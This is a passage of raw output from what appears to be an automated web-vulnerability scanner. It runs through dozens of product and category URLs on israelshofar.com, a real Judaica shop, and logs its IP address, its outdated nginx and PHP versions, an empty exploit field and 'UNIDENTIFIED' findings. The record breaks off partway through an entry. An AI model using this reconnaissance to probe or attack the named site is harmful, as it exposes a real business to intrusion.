  1214. |_[ + ] Information Server:: HTTP/1.1 404 Not Found, Server: nginx/1.14.1 X-Powered-By: PHP/5.4.45, IP:143.95.226.53:443
  1215. |_[ + ] More details:: / - / , ISP:
  1216. |_[ + ] Found:: UNIDENTIFIED
  1217.  
  1218. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1219. |_[ + ] [ 31 / 100 ]-[10:43:12] [ - ]
  1220. |_[ + ] Target:: [ https://www.israelshofar.com/wool-talis- ]
  1221. |_[ + ] Exploit::
  1222. |_[ + ] Information Server:: HTTP/1.1 404 Not Found, Server: nginx/1.14.1 X-Powered-By: PHP/5.4.45, IP:143.95.226.53:443
  1223. |_[ + ] More details:: / - / , ISP:
  1224. |_[ + ] Found:: UNIDENTIFIED
  1225.  
  1226. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1227. |_[ + ] [ 32 / 100 ]-[10:43:14] [ - ]
  1228. |_[ + ] Target:: [ https://www.israelshofar.com/Moadim-Talis ]
  1229. |_[ + ] Exploit::
  1230. |_[ + ] Information Server:: HTTP/1.1 404 Not Found, Server: nginx/1.14.1 X-Powered-By: PHP/5.4.45, IP:143.95.226.53:443
  1231. |_[ + ] More details:: / - / , ISP:
  1232. |_[ + ] Found:: UNIDENTIFIED
  1233.  
  1234. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1235. |_[ + ] [ 33 / 100 ]-[10:43:15] [ - ]
  1236. |_[ + ] Target:: [ https://www.israelshofar.com/tefillin-mezuzah?product_id=148 ]
  1237. |_[ + ] Exploit::
  1238. |_[ + ] Information Server:: HTTP/1.1 404 Not Found, Server: nginx/1.14.1 X-Powered-By: PHP/5.4.45, IP:143.95.226.53:443
  1239. |_[ + ] More details:: / - / , ISP:
  1240. |_[ + ] Found:: UNIDENTIFIED
  1241.  
  1242. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1243. |_[ + ] [ 34 / 100 ]-[10:43:18] [ - ]
  1244. |_[ + ] Target:: [ https://www.israelshofar.com/-tefillin-pshutot-mehudarim- ]
  1245. |_[ + ] Exploit::
  1246. |_[ + ] Information Server:: HTTP/1.1 404 Not Found, Server: nginx/1.14.1 X-Powered-By: PHP/5.4.45, IP:143.95.226.53:443
  1247. |_[ + ] More details:: / - / , ISP:
  1248. |_[ + ] Found:: UNIDENTIFIED
  1249.  
  1250. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1251. |_[ + ] [ 35 / 100 ]-[10:43:19] [ - ]
  1252. |_[ + ] Target:: [ https://www.israelshofar.com/Emanuel-Wooden-Mezuzah-Jerusalem ]
  1253. |_[ + ] Exploit::
  1254. |_[ + ] Information Server:: HTTP/1.1 404 Not Found, Server: nginx/1.14.1 X-Powered-By: PHP/5.4.45, IP:143.95.226.53:443
  1255. |_[ + ] More details:: / - / , ISP:
  1256. |_[ + ] Found:: UNIDENTIFIED
  1257.  
  1258. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1259. |_[ + ] [ 36 / 100 ]-[10:43:21] [ - ]
  1260. |_[ + ] Target:: [ https://www.israelshofar.com/-bar-mitzvah-tefillin- ]
  1261. |_[ + ] Exploit::
  1262. |_[ + ] Information Server:: HTTP/1.1 404 Not Found, Server: nginx/1.14.1 X-Powered-By: PHP/5.4.45, IP:143.95.226.53:443
  1263. |_[ + ] More details:: / - / , ISP:
  1264. |_[ + ] Found:: UNIDENTIFIED
  1265.  
  1266. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1267. |_[ + ] [ 37 / 100 ]-[10:43:23] [ - ]
  1268. |_[ + ] Target:: [ https://www.israelshofar.com/polished-shofar- ]
  1269. |_[ + ] Exploit::
  1270. |_[ + ] Information Server:: HTTP/1.1 404 Not Found, Server: nginx/1.14.1 X-Powered-By: PHP/5.4.45, IP:143.95.226.53:443
  1271. |_[ + ] More details:: / - / , ISP:
  1272. |_[ + ] Found:: UNIDENTIFIED
  1273.  
  1274. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1275. |_[ + ] [ 38 / 100 ]-[10:43:24] [ - ]
  1276. |_[ + ] Target:: [ https://www.israelshofar.com/kmo-like-turkish-talit- ]
  1277. |_[ + ] Exploit::
  1278. |_[ + ] Information Server:: HTTP/1.1 404 Not Found, Server: nginx/1.14.1 X-Powered-By: PHP/5.4.45, IP:143.95.226.53:443
  1279. |_[ + ] More details:: / - / , ISP:
  1280. |_[ + ] Found:: UNIDENTIFIED
  1281.  
  1282. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1283. |_[ + ] [ 39 / 100 ]-[10:43:27] [ - ]
  1284. |_[ + ] Target:: [ https://www.israelshofar.com/Emanuel-Miriam-Deborah-designs ]
  1285. |_[ + ] Exploit::
  1286. |_[ + ] Information Server:: HTTP/1.1 404 Not Found, Server: nginx/1.14.1 X-Powered-By: PHP/5.4.45, IP:143.95.226.53:443
  1287. |_[ + ] More details:: / - / , ISP:
  1288. |_[ + ] Found:: UNIDENTIFIED
  1289.  
  1290. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1291. |_[ + ] [ 40 / 100 ]-[10:43:28] [ - ]
  1292. |_[ + ] Target:: [ https://www.israelshofar.com/tefillin-mezuzah ]
  1293. |_[ + ] Exploit::
  1294. |_[ + ] Information Server:: HTTP/1.1 404 Not Found, Server: nginx/1.14.1 X-Powered-By: PHP/5.4.45, IP:143.95.226.53:443
  1295. |_[ + ] More details:: / - / , ISP:
  1296. |_[ + ] Found:: UNIDENTIFIED
  1297.  
  1298. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1299. |_[ + ] [ 41 / 100 ]-[10:43:30] [ - ]
  1300. |_[ + ] Target:: [ https://www.israelshofar.com/Durable-Protective-Tefellin-Case ]
  1301. |_[ + ] Exploit::
  1302. |_[ + ] Information Server:: HTTP/1.1 404 Not Found, Server: nginx/1.14.1 X-Powered-By: PHP/5.4.45, IP:143.95.226.53:443
  1303. |_[ + ] More details:: / - / , ISP:
  1304. |_[ + ] Found:: UNIDENTIFIED
  1305.  
  1306. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1307. |_[ + ] [ 42 / 100 ]-[10:43:31] [ - ]
  1308. |_[ + ] Target:: [ https://www.israelshofar.com/hadar-talis- ]
  1309. |_[ + ] Exploit::
  1310. |_[ + ] Information Server:: HTTP/1.1 404 Not Found, Server: nginx/1.14.1 X-Powered-By: PHP/5.4.45, IP:143.95.226.53:443
  1311. |_[ + ] More details:: / - / , ISP:
  1312. |_[ + ] Found:: UNIDENTIFIED
  1313.  
  1314. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1315. |_[ + ] [ 43 / 100 ]-[10:43:33] [ - ]
  1316. |_[ + ] Target:: [ https://www.israelshofar.com/holidays/hanukkah- ]
  1317. |_[ + ] Exploit::
  1318. |_[ + ] Information Server:: HTTP/1.1 404 Not Found, Server: nginx/1.14.1 X-Powered-By: PHP/5.4.45, IP:143.95.226.53:443
  1319. |_[ + ] More details:: / - / , ISP:
  1320. |_[ + ] Found:: UNIDENTIFIED
  1321.  
  1322. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1323. |_[ + ] [ 44 / 100 ]-[10:43:34] [ - ]
  1324. |_[ + ] Target:: [ https://www.israelshofar.com/Chai-Talis ]
  1325. |_[ + ] Exploit::
  1326. |_[ + ] Information Server:: HTTP/1.1 404 Not Found, Server: nginx/1.14.1 X-Powered-By: PHP/5.4.45, IP:143.95.226.53:443
  1327. |_[ + ] More details:: / - / , ISP:
  1328. |_[ + ] Found:: UNIDENTIFIED
  1329.  
  1330. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1331. |_[ + ] [ 45 / 100 ]-[10:43:36] [ - ]
  1332. |_[ + ] Target:: [ https://www.israelshofar.com/fish-tallit- ]
  1333. |_[ + ] Exploit::
  1334. |_[ + ] Information Server:: HTTP/1.1 404 Not Found, Server: nginx/1.14.1 X-Powered-By: PHP/5.4.45, IP:143.95.226.53:443
  1335. |_[ + ] More details:: / - / , ISP:
  1336. |_[ + ] Found:: UNIDENTIFIED
  1337.  
  1338. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1339. |_[ + ] [ 46 / 100 ]-[10:43:37] [ - ]
  1340. |_[ + ] Target:: [ https://www.israelshofar.com/shofar-shofars ]
  1341. |_[ + ] Exploit::
  1342. |_[ + ] Information Server:: HTTP/1.1 404 Not Found, Server: nginx/1.14.1 X-Powered-By: PHP/5.4.45, IP:143.95.226.53:443
  1343. |_[ + ] More details:: / - / , ISP:
  1344. |_[ + ] Found:: UNIDENTIFIED
  1345.  
  1346. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1347. |_[ + ] [ 47 / 100 ]-[10:43:39] [ - ]
  1348. |_[ + ] Target:: [ https://www.israelshofar.com/-tefillin-dakot-dakos- ]
  1349. |_[ + ] Exploit::
  1350. |_[ + ] Information Server:: HTTP/1.1 404 Not Found, Server: nginx/1.14.1 X-Powered-By: PHP/5.4.45, IP:143.95.226.53:443
  1351. |_[ + ] More details:: / - / , ISP:
  1352. |_[ + ] Found:: UNIDENTIFIED
  1353.  
  1354. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1355. |_[ + ] [ 48 / 100 ]-[10:43:40] [ - ]
  1356. |_[ + ] Target:: [ https://www.israelshofar.com/habbad-talis- ]
  1357. |_[ + ] Exploit::
  1358. |_[ + ] Information Server:: HTTP/1.1 404 Not Found, Server: nginx/1.14.1 X-Powered-By: PHP/5.4.45, IP:143.95.226.53:443
  1359. |_[ + ] More details:: / - / , ISP:
  1360. |_[ + ] Found:: UNIDENTIFIED
  1361.  
  1362. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1363. |_[ + ] [ 49 / 100 ]-[10:43:41] [ - ]
  1364. |_[ + ] Target:: [ http://www.israelshofar.com/talis-teymani- ]
  1365. |_[ + ] Exploit::
  1366. |_[ + ] Information Server:: HTTP/1.1 301 Moved Permanently, , IP:143.95.226.53:80
  1367. |_[ + ] More details:: / - / , ISP:
  1368. |_[ + ] Found:: UNIDENTIFIED
  1369.  
  1370. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1371. |_[ + ] [ 50 / 100 ]-[10:43:43] [ - ]
  1372. |_[ + ] Target:: [ https://www.israelshofar.com/shabbat/tablecloths ]
  1373. |_[ + ] Exploit::
  1374. |_[ + ] Information Server:: HTTP/1.1 404 Not Found, Server: nginx/1.14.1 X-Powered-By: PHP/5.4.45, IP:143.95.226.53:443
  1375. |_[ + ] More details:: / - / , ISP:
  1376. |_[ + ] Found:: UNIDENTIFIED
  1377.  
  1378. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1379. |_[ + ] [ 51 / 100 ]-[10:43:44] [ - ]
  1380. |_[ + ] Target:: [ https://www.israelshofar.com/shofar-accessories ]
  1381. |_[ + ] Exploit::
  1382. |_[ + ] Information Server:: HTTP/1.1 404 Not Found, Server: nginx/1.14.1 X-Powered-By: PHP/5.4.45, IP:143.95.226.53:443
  1383. |_[ + ] More details:: / - / , ISP:
  1384. |_[ + ] Found:: UNIDENTIFIED
  1385.  
  1386. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1387. |_[ + ] [ 52 / 100 ]-[10:43:45] [ - ]
  1388. |_[ + ] Target:: [ http://www.israelshofar.com/harp-of-david-blue ]
  1389. |_[ + ] Exploit::
  1390. |_[ + ] Information Server:: HTTP/1.1 301 Moved Permanently, , IP:143.95.226.53:80
  1391. |_[ + ] More details:: / - / , ISP:
  1392. |_[ + ] Found:: UNIDENTIFIED
  1393.  
  1394. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1395. |_[ + ] [ 53 / 100 ]-[10:43:47] [ - ]
  1396. |_[ + ] Target:: [ https://www.israelshofar.com/shabbat/candlesticks ]
  1397. |_[ + ] Exploit::
  1398. |_[ + ] Information Server:: HTTP/1.1 404 Not Found, Server: nginx/1.14.1 X-Powered-By: PHP/5.4.45, IP:143.95.226.53:443
  1399. |_[ + ] More details:: / - / , ISP:
  1400. |_[ + ] Found:: UNIDENTIFIED
  1401.  
  1402. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1403. |_[ + ] [ 54 / 100 ]-[10:43:49] [ - ]
  1404. |_[ + ] Target:: [ https://www.israelshofar.com/harp-of-david-purple ]
  1405. |_[ + ] Exploit::
  1406. |_[ + ] Information Server:: HTTP/1.1 404 Not Found, Server: nginx/1.14.1 X-Powered-By: PHP/5.4.45, IP:143.95.226.53:443
  1407. |_[ + ] More details:: / - / , ISP:
  1408. |_[ + ] Found:: UNIDENTIFIED
  1409.  
  1410. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1411. |_[ + ] [ 55 / 100 ]-[10:43:51] [ - ]
  1412. |_[ + ] Target:: [ https://www.israelshofar.com/shofar-cover ]
  1413. |_[ + ] Exploit::
  1414. |_[ + ] Information Server:: HTTP/1.1 404 Not Found, Server: nginx/1.14.1 X-Powered-By: PHP/5.4.45, IP:143.95.226.53:443
  1415. |_[ + ] More details:: / - / , ISP:
  1416. |_[ + ] Found:: UNIDENTIFIED
  1417.  
  1418. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1419. |_[ + ] [ 56 / 100 ]-[10:43:52] [ - ]
  1420. |_[ + ] Target:: [ http://www.israelshofar.com/tallit/canaan-gallery-1 ]
  1421. |_[ + ] Exploit::
  1422. |_[ + ] Information Server:: HTTP/1.1 301 Moved Permanently, , IP:143.95.226.53:80
  1423. |_[ + ] More details:: / - / , ISP:
  1424. |_[ + ] Found:: UNIDENTIFIED
  1425.  
  1426. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1427. |_[ + ] [ 57 / 100 ]-[10:43:54] [ - ]
  1428. |_[ + ] Target:: [ https://www.israelshofar.com/about-us ]
  1429. |_[ + ] Exploit::
  1430. |_[ + ] Information Server:: HTTP/1.1 404 Not Found, Server: nginx/1.14.1 X-Powered-By: PHP/5.4.45, IP:143.95.226.53:443
  1431. |_[ + ] More details:: / - / , ISP:
  1432. |_[ + ] Found:: UNIDENTIFIED
  1433.  
  1434. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1435. |_[ + ] [ 58 / 100 ]-[10:43:55] [ - ]
  1436. |_[ + ] Target:: [ https://www.israelshofar.com/delivery-information ]
  1437. |_[ + ] Exploit::
  1438. |_[ + ] Information Server:: HTTP/1.1 404 Not Found, Server: nginx/1.14.1 X-Powered-By: PHP/5.4.45, IP:143.95.226.53:443
  1439. |_[ + ] More details:: / - / , ISP:
  1440. |_[ + ] Found:: UNIDENTIFIED
  1441.  
  1442. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1443. |_[ + ] [ 59 / 100 ]-[10:43:57] [ - ]
  1444. |_[ + ] Target:: [ https://www.israelshofar.com/gemsbock-shofars- ]
  1445. |_[ + ] Exploit::
  1446. |_[ + ] Information Server:: HTTP/1.1 404 Not Found, Server: nginx/1.14.1 X-Powered-By: PHP/5.4.45, IP:143.95.226.53:443
  1447. |_[ + ] More details:: / - / , ISP:
  1448. |_[ + ] Found:: UNIDENTIFIED
  1449.  
  1450. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1451. |_[ + ] [ 60 / 100 ]-[10:43:58] [ - ]
  1452. |_[ + ] Target:: [ https://www.israelshofar.com/shofar-stand ]
  1453. |_[ + ] Exploit::
  1454. |_[ + ] Information Server:: HTTP/1.1 404 Not Found, Server: nginx/1.14.1 X-Powered-By: PHP/5.4.45, IP:143.95.226.53:443
  1455. |_[ + ] More details:: / - / , ISP:
  1456. |_[ + ] Found:: UNIDENTIFIED
  1457.  
  1458. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1459. |_[ + ] [ 61 / 100 ]-[10:44:00] [ - ]
  1460. |_[ + ] Target:: [ https://www.israelshofar.com/Emanuel-Wooden-Mezuzah-Oriental-Case ]
  1461. |_[ + ] Exploit::
  1462. |_[ + ] Information Server:: HTTP/1.1 404 Not Found, Server: nginx/1.14.1 X-Powered-By: PHP/5.4.45, IP:143.95.226.53:443
  1463. |_[ + ] More details:: / - / , ISP:
  1464. |_[ + ] Found:: UNIDENTIFIED
  1465.  
  1466. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1467. |_[ + ] [ 62 / 100 ]-[10:44:01] [ - ]
  1468. |_[ + ] Target:: [ https://www.israelshofar.com/Special-Tefillin-Ohr-Echad-Gasot ]
  1469. |_[ + ] Exploit::
  1470. |_[ + ] Information Server:: HTTP/1.1 404 Not Found, Server: nginx/1.14.1 X-Powered-By: PHP/5.4.45, IP:143.95.226.53:443
  1471. |_[ + ] More details:: / - / , ISP:
  1472. |_[ + ] Found:: UNIDENTIFIED
  1473.  
  1474. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1475. |_[ + ] [ 63 / 100 ]-[10:44:03] [ - ]
  1476. |_[ + ] Target:: [ https://www.israelshofar.com/Emanuel-Wooden-Mezuzah-Jerusalem-Blue ]
  1477. |_[ + ] Exploit::
  1478. |_[ + ] Information Server:: HTTP/1.1 404 Not Found, Server: nginx/1.14.1 X-Powered-By: PHP/5.4.45, IP:143.95.226.53:443
  1479. |_[ + ] More details:: / - / , ISP:
  1480. |_[ + ] Found:: UNIDENTIFIED
  1481.  
  1482. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1483. |_[ + ] [ 64 / 100 ]-[10:44:04] [ - ]
  1484. |_[ + ] Target:: [ https://www.israelshofar.com/Bar-Mitzvah-Set-Jerusalem-blue ]
  1485. |_[ + ] Exploit::
  1486. |_[ + ] Information Server:: HTTP/1.1 404 Not Found, Server: nginx/1.14.1 X-Powered-By: PHP/5.4.45, IP:143.95.226.53:443
  1487. |_[ + ] More details:: / - / , ISP:
  1488. |_[ + ] Found:: UNIDENTIFIED
  1489.  
  1490. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1491. |_[ + ] [ 65 / 100 ]-[10:44:06] [ - ]
  1492. |_[ + ] Target:: [ https://www.israelshofar.com/-special-tefillin-dakot-dakos- ]
  1493. |_[ + ] Exploit::
  1494. |_[ + ] Information Server:: HTTP/1.1 404 Not Found, Server: nginx/1.14.1 X-Powered-By: PHP/5.4.45, IP:143.95.226.53:443
  1495. |_[ + ] More details:: / - / , ISP:
  1496. |_[ + ] Found:: UNIDENTIFIED
  1497.  
  1498. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1499. |_[ + ] [ 66 / 100 ]-[10:44:07] [ - ]
  1500. |_[ + ] Target:: [ https://www.israelshofar.com/tallit?limit=50 ]
  1501. |_[ + ] Exploit::
  1502. |_[ + ] Information Server:: HTTP/1.1 404 Not Found, Server: nginx/1.14.1 X-Powered-By: PHP/5.4.45, IP:143.95.226.53:443
  1503. |_[ + ] More details:: / - / , ISP:
  1504. |_[ + ] Found:: UNIDENTIFIED
  1505.  
  1506. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1507. |_[ + ] [ 67 / 100 ]-[10:44:09] [ - ]
  1508. |_[ + ] Target:: [ https://www.israelshofar.com/-high-quality-tefillin-pshutot- ]
  1509. |_[ + ] Exploit::
  1510. |_[ + ] Information Server:: HTTP/1.1 404 Not Found, Server: nginx/1.14.1 X-Powered-By: PHP/5.4.45, IP:143.95.226.53:443
  1511. |_[ + ] More details:: / - / , ISP:
  1512. |_[ + ] Found:: UNIDENTIFIED
  1513.  
  1514. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1515. |_[ + ] [ 68 / 100 ]-[10:44:11] [ - ]
  1516. |_[ + ] Target:: [ https://www.israelshofar.com/tallit?limit=25 ]
  1517. |_[ + ] Exploit::
  1518. |_[ + ] Information Server:: HTTP/1.1 404 Not Found, Server: nginx/1.14.1 X-Powered-By: PHP/5.4.45, IP:143.95.226.53:443
  1519. |_[ + ] More details:: / - / , ISP:
  1520. |_[ + ] Found:: UNIDENTIFIED
  1521.  
  1522. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1523. |_[ + ] [ 69 / 100 ]-[10:44:13] [ - ]
  1524. |_[ + ] Target:: [ https://www.israelshofar.com/Armenian-Kiddus-Elijah-cup-plate ]
  1525. |_[ + ] Exploit::
  1526. |_[ + ] Information Server:: HTTP/1.1 404 Not Found, Server: nginx/1.14.1 X-Powered-By: PHP/5.4.45, IP:143.95.226.53:443
  1527. |_[ + ] More details:: / - / , ISP:
  1528. |_[ + ] Found:: UNIDENTIFIED
  1529.  
  1530. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1531. |_[ + ] [ 70 / 100 ]-[10:44:14] [ - ]
  1532. |_[ + ] Target:: [ https://www.israelshofar.com/Emanuel-embroidered-talit-Jerusalem-TFE ]
  1533. |_[ + ] Exploit::
  1534. |_[ + ] Information Server:: HTTP/1.1 404 Not Found, Server: nginx/1.14.1 X-Powered-By: PHP/5.4.45, IP:143.95.226.53:443
  1535. |_[ + ] More details:: / - / , ISP:
  1536. |_[ + ] Found:: UNIDENTIFIED
  1537.  
  1538. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1539. |_[ + ] [ 71 / 100 ]-[10:44:15] [ - ]
  1540. |_[ + ] Target:: [ http://www.israelshofar.com/Emanuel-Menorah-Moroccan-Pomegranate-Tree ]
  1541. |_[ + ] Exploit::
  1542. |_[ + ] Information Server:: HTTP/1.1 301 Moved Permanently, , IP:143.95.226.53:80
  1543. |_[ + ] More details:: / - / , ISP:
  1544. |_[ + ] Found:: UNIDENTIFIED
  1545.  
  1546. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1547. |_[ + ] [ 72 / 100 ]-[10:44:17] [ - ]
  1548. |_[ + ] Target:: [ https://www.israelshofar.com/Privacy Policy ]
  1549. |_[ + ] Exploit::
  1550. |_[ + ] Information Server:: HTTP/1.1 404 Not Found, Server: nginx/1.14.1 X-Powered-By: PHP/5.4.45, IP:143.95.226.53:443
  1551. |_[ + ] More details:: / - / , ISP:
  1552. |_[ + ] Found:: UNIDENTIFIED
  1553.  
  1554. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1555. |_[ + ] [ 73 / 100 ]-[10:44:18] [ - ]
  1556. |_[ + ] Target:: [ https://www.israelshofar.com/Jerusalem-Design-Tallit ]
  1557. |_[ + ] Exploit::
  1558. |_[ + ] Information Server:: HTTP/1.1 404 Not Found, Server: nginx/1.14.1 X-Powered-By: PHP/5.4.45, IP:143.95.226.53:443
  1559. |_[ + ] More details:: / - / , ISP:
  1560. |_[ + ] Found:: UNIDENTIFIED
  1561.  
  1562. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1563. |_[ + ] [ 74 / 100 ]-[10:44:20] [ - ]
  1564. |_[ + ] Target:: [ https://www.israelshofar.com/rams-horn-shofar ]
  1565. |_[ + ] Exploit::
  1566. |_[ + ] Information Server:: HTTP/1.1 404 Not Found, Server: nginx/1.14.1 X-Powered-By: PHP/5.4.45, IP:143.95.226.53:443
  1567. |_[ + ] More details:: / - / , ISP:
  1568. |_[ + ] Found:: UNIDENTIFIED
  1569.  
  1570. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1571. |_[ + ] [ 75 / 100 ]-[10:44:21] [ - ]
  1572. |_[ + ] Target:: [ https://www.israelshofar.com/Seven-Fruits-Tallit ]
  1573. |_[ + ] Exploit::
  1574. |_[ + ] Information Server:: HTTP/1.1 404 Not Found, Server: nginx/1.14.1 X-Powered-By: PHP/5.4.45, IP:143.95.226.53:443
  1575. |_[ + ] More details:: / - / , ISP:
  1576. |_[ + ] Found:: UNIDENTIFIED
  1577.  
  1578. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1579. |_[ + ] [ 76 / 100 ]-[10:44:22] [ - ]
  1580. |_[ + ] Target:: [ http://www.israelshofar.com/shabbat/Kiddush-Cups ]
  1581. |_[ + ] Exploit::
  1582. |_[ + ] Information Server:: HTTP/1.1 301 Moved Permanently, , IP:143.95.226.53:80
  1583. |_[ + ] More details:: / - / , ISP:
  1584. |_[ + ] Found:: UNIDENTIFIED
  1585.  
  1586. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1587. |_[ + ] [ 77 / 100 ]-[10:44:24] [ - ]
  1588. |_[ + ] Target:: [ https://www.israelshofar.com/Silk-Strips-Tallit ]
  1589. |_[ + ] Exploit::
  1590. |_[ + ] Information Server:: HTTP/1.1 404 Not Found, Server: nginx/1.14.1 X-Powered-By: PHP/5.4.45, IP:143.95.226.53:443
  1591. |_[ + ] More details:: / - / , ISP:
  1592. |_[ + ] Found:: UNIDENTIFIED
  1593.  
  1594. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1595. |_[ + ] [ 78 / 100 ]-[10:44:25] [ - ]
  1596. |_[ + ] Target:: [ http://www.israelshofar.com/shabbat/challah-cover ]
  1597. |_[ + ] Exploit::
  1598. |_[ + ] Information Server:: HTTP/1.1 301 Moved Permanently, , IP:143.95.226.53:80
  1599. |_[ + ] More details:: / - / , ISP:
  1600. |_[ + ] Found:: UNIDENTIFIED
  1601.  
  1602. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1603. |_[ + ] [ 79 / 100 ]-[10:44:26] [ - ]
  1604. |_[ + ] Target:: [ https://www.israelshofar.com/tallit/modern-tallit ]
  1605. |_[ + ] Exploit::
  1606. |_[ + ] Information Server:: HTTP/1.1 404 Not Found, Server: nginx/1.14.1 X-Powered-By: PHP/5.4.45, IP:143.95.226.53:443
  1607. |_[ + ] More details:: / - / , ISP:
  1608. |_[ + ] Found:: UNIDENTIFIED
  1609.  
  1610. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1611. |_[ + ] [ 80 / 100 ]-[10:44:28] [ - ]
  1612. |_[ + ] Target:: [ https://www.israelshofar.com/tallit-prayer-shawl ]
  1613. |_[ + ] Exploit::
  1614. |_[ + ] Information Server:: HTTP/1.1 404 Not Found, Server: nginx/1.14.1 X-Powered-By: PHP/5.4.45, IP:143.95.226.53:443
  1615. |_[ + ] More details:: / - / , ISP:
  1616. |_[ + ] Found:: UNIDENTIFIED
  1617.  
  1618. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1619. |_[ + ] [ 81 / 100 ]-[10:44:30] [ - ]
  1620. |_[ + ] Target:: [ https://www.israelshofar.com/reffael-shofar-tallit- ]
  1621. |_[ + ] Exploit::
  1622. |_[ + ] Information Server:: HTTP/1.1 404 Not Found, Server: nginx/1.14.1 X-Powered-By: PHP/5.4.45, IP:143.95.226.53:443
  1623. |_[ + ] More details:: / - / , ISP:
  1624. |_[ + ] Found:: UNIDENTIFIED
  1625.  
  1626. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1627. |_[ + ] [ 82 / 100 ]-[10:44:32] [ - ]
  1628. |_[ + ] Target:: [ https://www.israelshofar.com/tallit/talis-teymani- ]
  1629. |_[ + ] Exploit::
  1630. |_[ + ] Information Server:: HTTP/1.1 404 Not Found, Server: nginx/1.14.1 X-Powered-By: PHP/5.4.45, IP:143.95.226.53:443
  1631. |_[ + ] More details:: / - / , ISP:
  1632. |_[ + ] Found:: UNIDENTIFIED
  1633.  
  1634. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1635. |_[ + ] [ 83 / 100 ]-[10:44:34] [ - ]
  1636. |_[ + ] Target:: [ https://www.israelshofar.com/holidays/rosh-hashanah- ]
  1637. |_[ + ] Exploit::
  1638. |_[ + ] Information Server:: HTTP/1.1 404 Not Found, Server: nginx/1.14.1 X-Powered-By: PHP/5.4.45, IP:143.95.226.53:443
  1639. |_[ + ] More details:: / - / , ISP:
  1640. |_[ + ] Found:: UNIDENTIFIED
  1641.  
  1642. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1643. |_[ + ] [ 84 / 100 ]-[10:44:35] [ - ]
  1644. |_[ + ] Target:: [ https://www.israelshofar.com/tallit/noy-talis- ]
  1645. |_[ + ] Exploit::
  1646. |_[ + ] Information Server:: HTTP/1.1 404 Not Found, Server: nginx/1.14.1 X-Powered-By: PHP/5.4.45, IP:143.95.226.53:443
  1647. |_[ + ] More details:: / - / , ISP:
  1648. |_[ + ] Found:: UNIDENTIFIED
  1649.  
  1650. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1651. |_[ + ] [ 85 / 100 ]-[10:44:37] [ - ]
  1652. |_[ + ] Target:: [ https://www.israelshofar.com/shofar?product_id=260 ]
  1653. |_[ + ] Exploit::
  1654. |_[ + ] Information Server:: HTTP/1.1 404 Not Found, Server: nginx/1.14.1 X-Powered-By: PHP/5.4.45, IP:143.95.226.53:443
  1655. |_[ + ] More details:: / - / , ISP:
  1656. |_[ + ] Found:: UNIDENTIFIED
  1657.  
  1658. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1659. |_[ + ] [ 86 / 100 ]-[10:44:38] [ - ]
  1660. |_[ + ] Target:: [ https://www.israelshofar.com/shabbat/challah-boards ]
  1661. |_[ + ] Exploit::
  1662. |_[ + ] Information Server:: HTTP/1.1 404 Not Found, Server: nginx/1.14.1 X-Powered-By: PHP/5.4.45, IP:143.95.226.53:443
  1663. |_[ + ] More details:: / - / , ISP:
  1664. |_[ + ] Found:: UNIDENTIFIED
  1665.  
  1666. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1667. |_[ + ] [ 87 / 100 ]-[10:44:40] [ - ]
  1668. |_[ + ] Target:: [ https://www.israelshofar.com/tallit/traditional-tallit ]
  1669. |_[ + ] Exploit::
  1670. |_[ + ] Information Server:: HTTP/1.1 404 Not Found, Server: nginx/1.14.1 X-Powered-By: PHP/5.4.45, IP:143.95.226.53:443
  1671. |_[ + ] More details:: / - / , ISP:
  1672. |_[ + ] Found:: UNIDENTIFIED
  1673.  
  1674. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1675. |_[ + ] [ 88 / 100 ]-[10:44:41] [ - ]
  1676. |_[ + ] Target:: [ https://www.israelshofar.com/shofar?product_id=273 ]
  1677. |_[ + ] Exploit::
